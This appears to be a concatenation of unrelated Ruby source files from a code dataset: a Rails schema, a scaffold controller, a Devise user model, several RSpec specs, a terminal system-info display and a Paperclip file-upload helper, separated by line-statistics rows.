create_table "open_startup_expenses", force: :cascade do |t|
t.date "occurred_on", null: false
t.string "description", null: false
t.string "url"
t.decimal "amount", null: false
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
end
create_table "open_startup_metrics", force: :cascade do |t|
t.date "occurred_on", null: false
t.jsonb "data", default: {}, null: false
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
end
create_table "open_startup_monthly_balances", force: :cascade do |t|
t.date "occurred_on", null: false
t.decimal "revenue", null: false
t.decimal "expenses", null: false
t.decimal "contributions", null: false
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
end
create_table "open_startup_revenue", force: :cascade do |t|
t.date "occurred_on", null: false
t.string "description", null: false
t.decimal "amount", null: false
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
end
create_table "open_startup_stripe_transactions", force: :cascade do |t|
t.string "stripe_id", null: false
t.decimal "amount", null: false
t.datetime "created", precision: 6, null: false
t.string "description", null: false
t.decimal "fee", null: false
t.string "transaction_type", null: false
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.index ["stripe_id"], name: "index_open_startup_stripe_transactions_on_stripe_id"
t.index ["transaction_type"], name: "index_open_startup_stripe_transactions_on_transaction_type"
end
create_table "open_startup_transactions", force: :cascade do |t|
t.date "occurred_on", null: false
t.string "description", null: false
t.string "url"
t.decimal "amount", null: false
t.integer "transaction_type", default: 1, null: false
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
end
create_table "pay_charges", force: :cascade do |t|
t.bigint "customer_id", null: false
t.bigint "subscription_id"
t.string "processor_id", null: false
t.integer "amount", null: false
t.string "currency"
t.integer "application_fee_amount"
t.integer "amount_refunded"
t.jsonb "metadata"
t.jsonb "data"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.index ["customer_id", "processor_id"], name: "index_pay_charges_on_customer_id_and_processor_id", unique: true
t.index ["subscription_id"], name: "index_pay_charges_on_subscription_id"
end
create_table "pay_customers", force: :cascade do |t|
t.string "owner_type"
t.bigint "owner_id"
t.string "processor", null: false
t.string "processor_id"
t.boolean "default"
t.jsonb "data"
t.datetime "deleted_at", precision: 6
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.index ["owner_type", "owner_id", "deleted_at", "default"], name: "pay_customer_owner_index"
t.index ["processor", "processor_id"], name: "index_pay_customers_on_processor_and_processor_id", unique: true
end
create_table "pay_merchants", force: :cascade do |t|
t.string "owner_type"
t.bigint "owner_id"
t.string "processor", null: false
t.string "processor_id"
t.boolean "default"
t.jsonb "data"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.index ["owner_type", "owner_id", "processor"], name: "index_pay_merchants_on_owner_type_and_owner_id_and_processor"
end
create_table "pay_payment_methods", force: :cascade do |t|
t.bigint "customer_id", null: false
t.string "processor_id", null: false
t.boolean "default"
t.string "type"
t.jsonb "data"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.index ["customer_id", "processor_id"], name: "index_pay_payment_methods_on_customer_id_and_processor_id", unique: true
end
create_table "pay_subscriptions", force: :cascade do |t|
t.bigint "customer_id", null: false
t.string "name", null: false
t.string "processor_id", null: false
t.string "processor_plan", null: false
t.integer "quantity", default: 1, null: false
t.string "status", null: false
t.datetime "trial_ends_at", precision: 6
t.datetime "ends_at", precision: 6
t.decimal "application_fee_percent", precision: 8, scale: 2
t.jsonb "metadata"
t.jsonb "data"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.index ["customer_id", "processor_id"], name: "index_pay_subscriptions_on_customer_id_and_processor_id", unique: true
end
create_table "pay_webhooks", force: :cascade do |t|
t.string "processor"
t.string "event_type"
t.jsonb "event"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
end
create_table "role_types", force: :cascade do |t|
t.bigint "developer_id"
t.boolean "part_time_contract"
t.boolean "full_time_contract"
t.boolean "full_time_employment"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.index ["developer_id"], name: "index_role_types_on_developer_id", unique: true
end
create_table "users", force: :cascade do |t|
t.string "email", default: "", null: false
t.string "encrypted_password", default: "", null: false
t.string "reset_password_token"
t.datetime "reset_password_sent_at", precision: 6
t.datetime "remember_created_at", precision: 6
t.string "confirmation_token"
t.datetime "confirmed_at", precision: 6
t.datetime "confirmation_sent_at", precision: 6
t.string "unconfirmed_email"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.boolean "admin", default: false, null: false
t.index ["confirmation_token"], name: "index_users_on_confirmation_token", unique: true
t.index ["email"], name: "index_users_on_email", unique: true
t.index ["reset_password_token"], name: "index_users_on_reset_password_token", unique: true
end
add_foreign_key "active_storage_attachments", "active_storage_blobs", column: "blob_id"
add_foreign_key "active_storage_variant_records", "active_storage_blobs", column: "blob_id"
add_foreign_key "pay_charges", "pay_customers", column: "customer_id"
add_foreign_key "pay_charges", "pay_subscriptions", column: "subscription_id"
add_foreign_key "pay_payment_methods", "pay_customers", column: "customer_id"
add_foreign_key "pay_subscriptions", "pay_customers", column: "customer_id"
add_foreign_key "role_types", "developers"
end
| 41.056478 | 126 | 0.709905 |
e88583c1dc22ce3787dbb5a7ac6186ccef58ef1c | 1,782 | class CantsController < ApplicationController
# Member actions load the record once via this callback.
before_action :set_cant, only: [:show, :edit, :update, :destroy]
# GET /cants
# GET /cants.json
def index
@cants = Cant.all
end
# GET /cants/1
# GET /cants/1.json
def show
end
# GET /cants/new
def new
@cant = Cant.new
end
# GET /cants/1/edit
def edit
end
# POST /cants
# POST /cants.json
# Standard scaffold create: renders the form again (HTML) or validation
# errors (JSON) when the record fails to save.
def create
@cant = Cant.new(cant_params)
respond_to do |format|
if @cant.save
format.html { redirect_to @cant, notice: 'Cant was successfully created.' }
format.json { render :show, status: :created, location: @cant }
else
format.html { render :new }
format.json { render json: @cant.errors, status: :unprocessable_entity }
end
end
end
# PATCH/PUT /cants/1
# PATCH/PUT /cants/1.json
def update
respond_to do |format|
if @cant.update(cant_params)
format.html { redirect_to @cant, notice: 'Cant was successfully updated.' }
format.json { render :show, status: :ok, location: @cant }
else
format.html { render :edit }
format.json { render json: @cant.errors, status: :unprocessable_entity }
end
end
end
# DELETE /cants/1
# DELETE /cants/1.json
def destroy
@cant.destroy
respond_to do |format|
format.html { redirect_to cants_url, notice: 'Cant was successfully destroyed.' }
format.json { head :no_content }
end
end
private
# Use callbacks to share common setup or constraints between actions.
def set_cant
@cant = Cant.find(params[:id])
end
# Never trust parameters from the scary internet, only allow the white list through.
def cant_params
params.require(:cant).permit(:name, :prov_id)
end
end
| 23.76 | 88 | 0.637486 |
class User < ApplicationRecord
  # Devise authentication modules. Others available are:
  # :lockable, :rememberable
  devise :database_authenticatable,
    :trackable,
    :timeoutable

  devise :omniauthable, omniauth_providers: Rails.configuration.x.omniauth.providers

  belongs_to :organization, optional: true
  has_many :user_roles, dependent: :destroy
  has_many :forms, through: :user_roles, primary_key: "form_id"
  has_many :collections, through: :organization

  validate :api_key_format
  before_save :update_api_key_updated_at

  # Stamp api_key_updated_at whenever the key itself changes so key age
  # can be audited.
  def update_api_key_updated_at
    if self.api_key_changed?
      self.api_key_updated_at = Time.now
    end
  end

  # api.data.gov keys are exactly 40 characters; reject anything else early.
  def api_key_format
    if self.api_key.present? && self.api_key.length != 40
      errors.add(:api_key, "is not 40 characters, as expected from api.data.gov.")
    end
  end

  after_create :send_new_user_notification

  # Only government TLDs may register (bypassed when GitHub OAuth is configured).
  APPROVED_DOMAINS = [".gov", ".mil"]

  validates :email, presence: true, if: :tld_check

  scope :active, -> { where("inactive ISNULL or inactive = false") }

  def self.admins
    User.where(admin: true)
  end

  # Find or create a user from an OmniAuth auth hash.
  def self.from_omniauth(auth)
    # Set login_dot_gov as Provider for legacy TP Devise accounts
    # TODO: Remove once all accounts are migrated/have `provider` and `uid` set
    @existing_user = User.find_by_email(auth.info.email)
    if @existing_user && !@existing_user.provider.present?
      @existing_user.provider = auth.provider
      @existing_user.uid = auth.uid
      @existing_user.save
    end

    # For login.gov native accounts
    where(provider: auth.provider, uid: auth.uid).first_or_create do |user|
      user.email = auth.info.email
      user.password = Devise.friendly_token[0,24]
    end
  end

  # Validates the email's TLD; on success assigns an organization.
  # Returns false (adding an error) for non-approved TLDs.
  def tld_check
    unless ENV['GITHUB_CLIENT_ID'].present? or APPROVED_DOMAINS.any? { |word| email.end_with?(word) }
      errors.add(:email, "is not from a valid TLD - #{APPROVED_DOMAINS.to_sentence} domains only")
      return false
    end
    # Call this from here, because I want to hard return if email fails.
    # Specifying `ensure_organization` as validator
    # ran every time (even when email was not valid), which was undesirable
    ensure_organization
  end

  # Display name for the user's organization; "Admin" for org-less admins,
  # nil otherwise.
  def organization_name
    if organization.present?
      organization.name
    elsif admin?
      "Admin"
    end
  end

  def role
    if self.admin?
      "Admin"
    else
      "User"
    end
  end

  # For Devise
  # This determines whether a user is inactive or not
  def active_for_authentication?
    self && !self.inactive?
  end

  # For Devise
  # This is the flash message shown to a user when inactive
  def inactive_message
    "User account is inactive"
  end

  # Flag the account inactive, notify the user, and log an audit event.
  def deactivate
    self.inactive = true
    self.save
    UserMailer.account_deactivated_notification(self).deliver_later
    Event.log_event(Event.names[:user_deactivated], "User", self.id, "User account #{self.email} deactivated on #{Date.today}")
  end

  def self.send_account_deactivation_notifications(expire_days)
    users = User.deactivation_pending(expire_days)
    users.each do | user |
      UserMailer.account_deactivation_scheduled_notification(user.email, expire_days).deliver_later
    end
  end

  # Active users whose 90-day inactivity deadline falls exactly
  # `expire_days` from now (a one-day window).
  def self.deactivation_pending(expire_days)
    min_time = ((90 - expire_days) + 1).days.ago
    max_time = (90 - expire_days).days.ago

    User.active.where("(last_sign_in_at ISNULL AND created_at BETWEEN ? AND ?) OR (last_sign_in_at BETWEEN ? AND ?)", min_time, max_time, min_time, max_time)
  end

  def self.deactivate_inactive_accounts
    # Find all accounts with no sign-in (or creation) within the last 90 days
    users = User.active.where("(last_sign_in_at ISNULL AND created_at <= ?) OR (last_sign_in_at <= ?)", 90.days.ago, 90.days.ago)
    users.each do | user |
      user.deactivate
    end
  end

  # CSV export of all users ordered by email; returns nil when there are none.
  # Uses #organization_name (not organization.name) so users without an
  # organization -- e.g. admins -- no longer raise NoMethodError on nil.
  def self.to_csv
    users = self.order("email")
    return nil unless users.present?

    header_attributes = ["organization_name", "email", "last_sign_in_at"]
    attributes = users.map { |u| {
      organization_name: u.organization_name,
      email: u.email,
      last_sign_in_at: u.last_sign_in_at
    }}

    CSV.generate(headers: true) do |csv|
      csv << header_attributes

      attributes.each do |attrs|
        csv << attrs.values
      end
    end
  end

  def set_api_key
    update(api_key: ApiKey.generator, api_key_updated_at: Time.now)
  end

  def unset_api_key
    update(api_key: nil, api_key_updated_at: nil)
  end

  private

  # Strip subdomains down to a registrable two-label domain.
  # NOTE(review): returns nil for hostnames with more than 4 labels, in
  # which case the Organization lookup below cannot match -- confirm
  # whether longer hostnames need handling.
  def parse_host_from_domain(string)
    fragments = string.split(".")
    if fragments.size == 2
      return string
    elsif fragments.size == 3
      fragments.shift
      return fragments.join(".")
    elsif fragments.size == 4
      fragments.shift
      fragments.shift
      return fragments.join(".")
    end
  end

  # Assign the user's organization based on their email domain, or flag
  # the account for manual setup when no Organization matches.
  def ensure_organization
    return if organization_id.present?

    email_address_domain = Mail::Address.new(self.email).domain
    parsed_domain = parse_host_from_domain(email_address_domain)

    if org = Organization.find_by_domain(parsed_domain)
      self.organization_id = org.id
    else
      UserMailer.no_org_notification(self).deliver_later if self.id
      errors.add(:organization, "'#{email_address_domain}' has not yet been configured for Touchpoints - Please contact the Feedback Analytics Team for assistance.")
    end
  end

  def send_new_user_notification
    UserMailer.new_user_notification(self).deliver_later
  end
end
| 29.095238 | 167 | 0.70231 |
878f90c3dcc077dfc0c600f983f62460071c0809 | 3,225 | require 'spec_helper'
require 'nokogiri'
describe LiquidInterpolatable::Filters do
  before do
    # Anonymous host class so the filter module is tested in isolation.
    @filter = Class.new do
      include LiquidInterpolatable::Filters
    end.new
  end

  describe 'uri_escape' do
    it 'should escape a string for use in URI' do
      expect(@filter.uri_escape('abc:/?=')).to eq('abc%3A%2F%3F%3D')
    end

    it 'should not raise an error when an operand is nil' do
      expect(@filter.uri_escape(nil)).to be_nil
    end
  end

  describe 'validations' do
    class Agents::InterpolatableAgent < Agent
      include LiquidInterpolatable

      def check
        create_event :payload => {}
      end

      def validate_options
        interpolated['foo']
      end
    end

    it "should finish without raising an exception" do
      agent = Agents::InterpolatableAgent.new(name: "test", options: { 'foo' => '{{bar}' })
      expect(agent.valid?).to eq(false)
      expect(agent.errors[:options].first).to match(/not properly terminated/)
    end
  end

  describe 'to_xpath' do
    before do
      # Round-trip helper: an escaped string fed through an XPath query
      # should come back unchanged.
      def @filter.to_xpath_roundtrip(string)
        Nokogiri::XML('').xpath(to_xpath(string))
      end
    end

    it 'should escape a string for use in XPath expression' do
      [
        %q{abc}.freeze,
        %q{'a"bc'dfa""fds''fa}.freeze,
      ].each { |string|
        expect(@filter.to_xpath_roundtrip(string)).to eq(string)
      }
    end

    it 'should stringify a non-string operand' do
      expect(@filter.to_xpath_roundtrip(nil)).to eq('')
      expect(@filter.to_xpath_roundtrip(1)).to eq('1')
    end
  end

  describe 'to_uri' do
    before do
      @agent = Agents::InterpolatableAgent.new(name: "test", options: { 'foo' => '{% assign u = s | to_uri %}{{ u.path }}' })
      @agent.interpolation_context['s'] = 'http://example.com/dir/1?q=test'
    end

    # The original file carried three near-identical "abosule URI"
    # examples; the first now exercises to_uri without a base URI and the
    # verbatim duplicate of the "with a base URI" example was removed.
    it 'should parse an absolute URI' do
      expect(@filter.to_uri('http://example.net/index.html')).to eq(URI('http://example.net/index.html'))
    end

    it 'should parse an absolute URI with a base URI specified' do
      expect(@filter.to_uri('http://example.net/index.html', 'http://example.com/dir/1')).to eq(URI('http://example.net/index.html'))
    end

    it 'should parse a relative URI with a base URI specified' do
      expect(@filter.to_uri('foo/index.html', 'http://example.com/dir/1')).to eq(URI('http://example.com/dir/foo/index.html'))
    end

    it 'should stringify a non-string operand' do
      expect(@filter.to_uri(123, 'http://example.com/dir/1')).to eq(URI('http://example.com/dir/123'))
    end

    it 'should return a URI value in interpolation' do
      expect(@agent.interpolated['foo']).to eq('/dir/1')
    end

    it 'should return a URI value resolved against a base URI in interpolation' do
      @agent.options['foo'] = '{% assign u = s | to_uri:"http://example.com/dir/1" %}{{ u.path }}'
      @agent.interpolation_context['s'] = 'foo/index.html'
      expect(@agent.interpolated['foo']).to eq('/dir/foo/index.html')
    end
  end
end
| 32.25 | 133 | 0.64062 |
1c5263c1941a541375f4b52755f96d1e2e0672b1 | 743 | require 'spec_helper'
# Verifies that loading the gcloud storage extension registers the
# :gcloud engine and exposes its uploader-level configuration accessors.
describe CarrierWave::Uploader::Base do
let(:uploader) do
Class.new(CarrierWave::Uploader::Base)
end
# NOTE(review): `derived_uploader` is not referenced by any example below
# -- presumably left over from a removed inheritance spec; confirm and drop.
let(:derived_uploader) do
Class.new(uploader)
end
it 'inserts :gcloud as a known storage engine' do
uploader.configure do |config|
expect(config.storage_engines).to have_key(:gcloud)
end
end
it 'defines gcloud specific storage options' do
expect(uploader).to respond_to(:gcloud_attributes)
end
it 'defines gcloud_credentials option on uploader' do
expect(uploader).to respond_to(:gcloud_credentials)
end
it 'defines gcloud_authenticated_url_expiration option on uploader' do
expect(uploader).to respond_to(:gcloud_authenticated_url_expiration)
end
end | 24.766667 | 72 | 0.748318 |
bbac728602223a7e5bf8a8985442b0e09217b26f | 337 | class CreatePosts < ActiveRecord::Migration
# Creates the posts table. `author_id` references users (no FK constraint
# added here); `published` defaults to false so new posts start as drafts.
def change
create_table :posts do |t|
t.integer :author_id
t.string :title
t.text :content
t.string :intention_type
t.string :intention_statement
t.boolean :published, default: false
t.datetime :published_at
t.timestamps
end
end
end
| 22.466667 | 43 | 0.664688 |
abeeb579e9b5f1cdb2bf5d4dae8f4bd84484657c | 3,412 | #-- encoding: UTF-8
#-- copyright
# OpenProject is a project management system.
# Copyright (C) 2012-2015 the OpenProject Foundation (OPF)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2013 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See doc/COPYRIGHT.rdoc for more details.
#++
require 'legacy_spec_helper'
# Legacy fixture-based model specs for Attachment: creation populates
# metadata (size, digest, content type) and writes a file to disk.
describe Attachment, type: :model do
fixtures :all
it 'should create' do
a = Attachment.new(container: WorkPackage.find(1),
file: uploaded_test_file('testfile.txt', 'text/plain'),
author: User.find(1))
assert a.save
assert_equal 'testfile.txt', a.filename
assert_equal 57, a.filesize
assert_equal 'text/plain', a.content_type
assert_equal 0, a.downloads
assert_equal 'f94d862ca1e4363e760431025673826c', a.digest
assert File.exist?(a.diskfile)
end
# An empty content type should be inferred from the file's extension.
it 'should create should auto assign content type' do
a = Attachment.new(container: WorkPackage.find(1),
file: uploaded_test_file('testfile.txt', ''),
author: User.find(1))
assert a.save
assert_equal 'text/plain', a.content_type
end
# Two attachments with the same filename must get distinct disk paths.
it 'should identical attachments at the same time should not overwrite' do
a1 = Attachment.create!(container: WorkPackage.find(1),
file: uploaded_test_file('testfile.txt', ''),
author: User.find(1))
a2 = Attachment.create!(container: WorkPackage.find(1),
file: uploaded_test_file('testfile.txt', ''),
author: User.find(1))
assert a1.diskfile.path != a2.diskfile.path
end
# NOTE(review): "Attachmnet" below is a typo in the context description
# string; harmless to behavior, fix when next touching this spec.
context 'Attachmnet#attach_files' do
it 'should add unsaved files to the object as unsaved attachments' do
# Can't use with_settings: here due to before hook
expect(Setting).to receive(:attachment_max_size)
.exactly(4).times
.and_return(0)
@issue = WorkPackage.find(1)
response = Attachment.attach_files(
@issue,
'1' => { 'file' => LegacyFileHelpers.mock_uploaded_file, 'description' => 'test 1' },
'2' => { 'file' => LegacyFileHelpers.mock_uploaded_file, 'description' => 'test 2' })
assert response[:unsaved].present?
assert_equal 2, response[:unsaved].length
assert response[:unsaved].first.new_record?
assert response[:unsaved].second.new_record?
assert_equal response[:unsaved], @issue.unsaved_attachments
end
end
end
| 39.674419 | 93 | 0.67966 |
f8ebc0bc2aa847458d0e93710e8135ee3d2a0f8e | 71 | module Dry
module Validation
# Gem version; the string is frozen so it can be shared without copying.
VERSION = '0.12.2'.freeze
end
end
| 11.833333 | 29 | 0.676056 |
e8f2f417b30df65f84c2c28c7dcd87cc72f072e5 | 1,403 | module RdsDbBackup
module Factory
# Fetches the latest production database dump from S3 and loads it into
# the local development database. Shells out to the aws/mysql CLIs via
# the `run` helper from Concerns::Resources.
class Export
  include Concerns::Resources

  # Downloads the most recent production dump from S3 (unless a cached
  # copy already exists under tmp/) and wraps it in a DbBackupFile.
  def fetch
    last_backup_filename = find_last_backup
    tmp_file_path = File.join(File.dirname(__FILE__), '../tmp', last_backup_filename)

    # File.exists? was deprecated and removed in Ruby 3.2; use File.exist?.
    if !File.exist?(tmp_file_path)
      s3_file_path = "s3://#{db_bucket}/#{last_backup_filename}"
      run("aws s3 cp #{s3_file_path} #{tmp_file_path} --region #{region}")
    end

    DbBackupFile.new(tmp_file_path, last_backup_filename)
  end

  # Drops and recreates the dev database, then streams the fetched dump
  # into it.
  def update_dev
    db_dump_path = fetch.tmp_file

    db_command(:drop)
    db_command(:create)
    run("gunzip < #{db_dump_path} | mysql #{credentials} #{dev_db_name}")
  end

  private

  def db_command(command)
    run("mysqladmin #{credentials} --force #{command} #{dev_db_name}")
  end

  # mysql CLI credential flags for the dev database, joined into one string.
  def credentials
    [
      "-u#{dev_db_username}",
      "-h#{dev_db_host}",
      "-P#{dev_db_port}",
      "-p#{dev_db_password}"
    ] * ' '
  end

  # FIXME(review): despite its name this returns an array of
  # [mtime, filename] pairs for ALL matching backups, not a single "last"
  # filename -- #fetch only works because File.join flattens the array.
  # Sorting by mtime and returning the newest filename looks like the
  # intent; confirm against callers before changing behavior.
  def find_last_backup
    backups = run("aws s3 ls s3://#{db_bucket} --region #{region} | grep #{project.production_db_name}").split("\n")
    backups.map! do |line|
      columns = line.split(" ")
      modified_at = Time.parse(columns[0..1] * ' ')
      [modified_at, columns.last]
    end
  end
end
end
end
| 24.614035 | 120 | 0.571632 |
269e7c1cb99e30dbd87d5963bfe07e3a3a60f639 | 5,667 | module Termclock
FILESYSTEM, FILESYSTEM_LABEL = if LS::FS.stat('/')[:blocks].to_i == 0
_pwd = Dir.pwd
pwd = _pwd.length > 8 ? _pwd[0..5] + '...' : _pwd
[?..freeze, pwd]
else
[?/.freeze, ?/.freeze]
end.freeze
@@cpu_usage = 0
@@cpu_usage_t = Thread.new { }.join
_tr = translate('Curr. DL/UL')
@@current_net_usage = "\u{1F4CA} #{_tr}:"
@@current_net_usage_t = Thread.new { }.join
class << self
def system_info(width, tc1, tc2, bold, italic)
unless @@cpu_usage_t.alive?
@@cpu_usage_t = Thread.new {
_cpu_usage = LS::CPU.usage(0.25)
@@cpu_usage = _cpu_usage ? "%0.2f".freeze % _cpu_usage : nil
}
end
unless @@current_net_usage_t.alive?
@@current_net_usage_t = Thread.new do
_m = LS::Net.current_usage(0.25)
_dl = _m[:received]
_ul = _m[:transmitted]
@@current_net_usage = if _dl && _ul
_tr = translate('Curr. DL/UL')
dl = LS::PrettifyBytes.convert_short_decimal(_dl)
ul = LS::PrettifyBytes.convert_short_decimal(_ul)
"\u{1F4CA} #{_tr}: #{t!("%-9s" % dl)} | #{t!("%9s" % ul)}"
else
EMPTY
end
end
end
cpu = if @@cpu_usage
_tr = translate('CPU')
"\u{1F9E0} #{_tr}: #{t!("%6s" % @@cpu_usage)}% (#{t!(LS::CPU.count_online)}/#{t!(LS::CPU.count)})"
else
EMPTY
end
battery = if LS::Battery.present?
stat = LS::Battery.stat
charge = stat[:charge].to_i
emoji, plug = "\u{1F50B}".freeze, EMPTY
if LS::Battery.charging?
emoji, plug = "\u{1F4A1}".freeze, "\u{1F50C} ".freeze
end
lives = "\u2665 ".freeze.*(charge.fdiv(20).ceil).chop
_tr = translate('Battery')
"#{emoji} #{_tr}: #{t!(charge)}% #{lives} (#{plug}#{translate(stat[:status])})"
else
EMPTY
end
_tr = translate('User')
user = "\u{1F481} #{_tr}: #{LS::User.get_current_user.capitalize}"
_tr = translate('Hostname')
hostname = "\u{1F4BB} #{_tr}: #{LS::OS.hostname}"
_tr = translate('IP Addr')
_m = LS::Net.total_bytes
ip = "\u{1F30F} #{_tr}: #{translate(LS::Net.ipv4_private, b: true)}"
_received = _m[:received]
_transmitted = _m[:transmitted]
_tr = translate('Totl. DL/UL')
tot_received = _received ? "\u{1F4C8} #{_tr}: #{t!('%-9s'.freeze % LS::PrettifyBytes.convert_short_decimal(_m[:received]))}" : nil
tot_transmitted = _transmitted ? " | #{t!('%9s'.freeze % LS::PrettifyBytes.convert_short_decimal(_transmitted))}" : nil
net_usage = if tot_received && tot_transmitted
tot_received + tot_transmitted
else
EMPTY
end
_m = LS::Memory.stat
_m.default = 0
_tr = translate('Mem')
memory = "\u{1F3B0} #{_tr}: #{t!(LS::PrettifyBytes.convert_short_decimal(_m[:used] * 1000))}"\
" / #{t!(LS::PrettifyBytes.convert_short_decimal(_m[:total] * 1000))}"\
" (#{t!("%.2f" % _m[:percent_used])}%)"
_m = LS::Swap.stat
_m.default = 0
_tr = translate('Swap')
swap = "\u{1F300} #{_tr}: #{t!(LS::PrettifyBytes.convert_short_decimal(_m[:used] * 1000))}"\
" / #{t!(LS::PrettifyBytes.convert_short_decimal(_m[:total] * 1000))}"\
" (#{t!("%.2f" % _m[:percent_used])}%)"
_m = LS::Filesystem.stat(FILESYSTEM)
_m.default = 0
_tr = translate('FS')
fs = "\u{1F4BD} #{_tr} (#{FILESYSTEM_LABEL}): #{t!(LS::PrettifyBytes.convert_short_decimal(_m[:used]))}"\
" / #{t!(LS::PrettifyBytes.convert_short_decimal(_m[:total]))}"\
" (#{t!("%.2f" % _m[:used].*(100).fdiv(_m[:total]).round(2))}%)"
pt = LS::Process.types.values
process = if pt.length > 0
_tr = translate('Process')
"\u{1F3ED} #{_tr}: T:#{t!("%4s" % pt.length)}|"\
"R:#{"%3s" % t!(pt.count(:running))}|"\
"S:#{"%3s" % t!(pt.count(:sleeping))}|"\
"I:#{"%3s" % t!(pt.count(:idle))}"
else
EMPTY
end
@@os_v ||= unless LS::OS.version.empty?
" (#{LS::OS.version})"
else
EMPTY
end
_tr = translate('Distrib')
@@os ||= "\u{1F427} #{_tr}: #{LS::OS.distribution} #{LS::OS.machine}#{@@os_v}"
_temp_uptime = LS::OS.uptime
_uptime = unless _temp_uptime.empty?
_temp_uptime
else
_u = LS::OS.uptime_i
{
hour: _u / 3600,
minute: _u % 3600 / 60,
second: _u % 3600 % 60,
jiffy: 0
}
end
_second = _uptime[:second]
_second_i = _second.to_i
hour = "%02d" % _uptime[:hour]
minute = "%02d" % _uptime[:minute]
second = "%02d" % _uptime[:second]
jiffy = "%02d" % _uptime[:jiffy]
_tr = translate('Uptime')
uptime = "\u{1F3A1} #{_tr}: #{t! hour}:#{t! minute}:#{t! second}:#{t! jiffy} (#{t! LS::OS.uptime_i}s)"
_tr = translate('LoadAvg')
_loadavg = LS::Sysinfo.loads.map! { |x| "%.2f" % x }
loadavg = "\u{1F525} #{_tr}: 1m #{translate(_loadavg[0], b: true)}|5m #{translate(_loadavg[1], b: true)}|15m #{translate(_loadavg[2], b: true)}"
all_info = []
max_l = 0
i = -1
[
user, hostname,
@@os, battery,
cpu, ip,
memory, @@current_net_usage,
swap, net_usage,
fs, process,
uptime, loadavg
].each { |x|
unless x.empty?
all_info << x
i += 1
if i.odd?
_x_len = x.length
max_l = _x_len if max_l < _x_len
end
end
}
max_l += 4
all_info.each_slice(2).map { |x, y|
_diff = width.-(x.length + max_l)
_diff = 0 if _diff < 1
y_to_s = y.to_s
padding = "#{SPACE * _diff}"
str = SPACE + x + padding + y_to_s
grads = SPACE + x.gradient(tc1, tc2, bold: bold, italic: italic) +
padding +
y_to_s.gradient(tc1, tc2, bold: bold, italic: italic)
len = str.grapheme_clusters.map { |x|
_x = x.bytesize./(2)
_x == 0 ? 1 : _x
}.sum
w = width - 2
len < w ? grads.+(SPACE.*(w - len)) : grads
}.join(NEWLINE)
end
end
end
| 25.995413 | 147 | 0.57226 |
bbc2bf5e7568f9cc422920a2115a7adbb9e7d28f | 401 | cask 'prizmo' do
version '3.7'
sha256 'd77cf9bfe7adff4e5bd6de6971f5d81d4dfbf9177c6abed62f71d70408aaada2'
url "https://www.creaceed.com/downloads/prizmo#{version.major}_#{version}.zip"
appcast "https://www.creaceed.com/appcasts/prizmo#{version.major}.xml"
name 'Prizmo'
homepage 'https://creaceed.com/prizmo'
auto_updates true
depends_on macos: '>= :yosemite'
app 'Prizmo.app'
end
| 26.733333 | 80 | 0.74813 |
1d41ce14c2554772ef96dd04131d8967a3e1244f | 1,617 | module Paperclip
# The Upfile module is a convenience module for adding uploaded-file-type methods
# to the +File+ class. Useful for testing.
# user.avatar = File.new("test/test_avatar.jpg")
module Upfile
# Infer the MIME-type of the file from the extension.
def content_type
type = (self.path.match(/\.(\w+)$/)[1] rescue "octet-stream").downcase
case type
when %r"jp(e|g|eg)" then "image/jpeg"
when %r"tiff?" then "image/tiff"
when %r"png", "gif", "bmp" then "image/#{type}"
when "txt" then "text/plain"
when %r"html?" then "text/html"
when "js" then "application/js"
when "csv", "xml", "css" then "text/#{type}"
else
# On BSDs, `file` doesn't give a result code of 1 if the file doesn't exist.
content_type = (Paperclip.run("file", "--mime-type #{self.path}").split(':').last.strip rescue "application/x-#{type}")
content_type = "application/x-#{type}" if content_type.match(/\(.*?\)/)
content_type
end
end
# Returns the file's normal name.
def original_filename
File.basename(self.path)
end
# Returns the size of the file.
def size
File.size(self)
end
end
end
# Let StringIO quack like an uploaded file: writable name/type attributes
# with lazy plain-text defaults when nothing has been assigned.
if defined?(StringIO)
  class StringIO
    attr_writer :original_filename, :content_type

    # Pseudo-filename, defaulting (and memoizing) to "stringio.txt".
    def original_filename
      @original_filename ||= "stringio.txt"
    end

    # MIME type, defaulting (and memoizing) to "text/plain".
    def content_type
      @content_type ||= "text/plain"
    end
  end
end
class File #:nodoc:
  # Give plain File objects the upload-style helpers
  # (content_type, original_filename, size).
  include Paperclip::Upfile
end
| 29.944444 | 127 | 0.592455 |
ac7ceaedb7c09a8a5d1eaa03eff52827c0daf004 | 299 | require 'rails_helper'
RSpec.describe Contenticus::Block, type: :model do
  # `subject` is the model class itself, used below for the count change.
  subject {described_class}

  it 'can serialize the fields' do
    page = Fabricate.create(:page)
    # Creating a block with a blockable + layout must persist one record.
    expect{described_class.create!(blockable: page, layout: "pages/frontpage")}.to change(subject, :count).by(1)
  end
end
| 23 | 112 | 0.729097 |
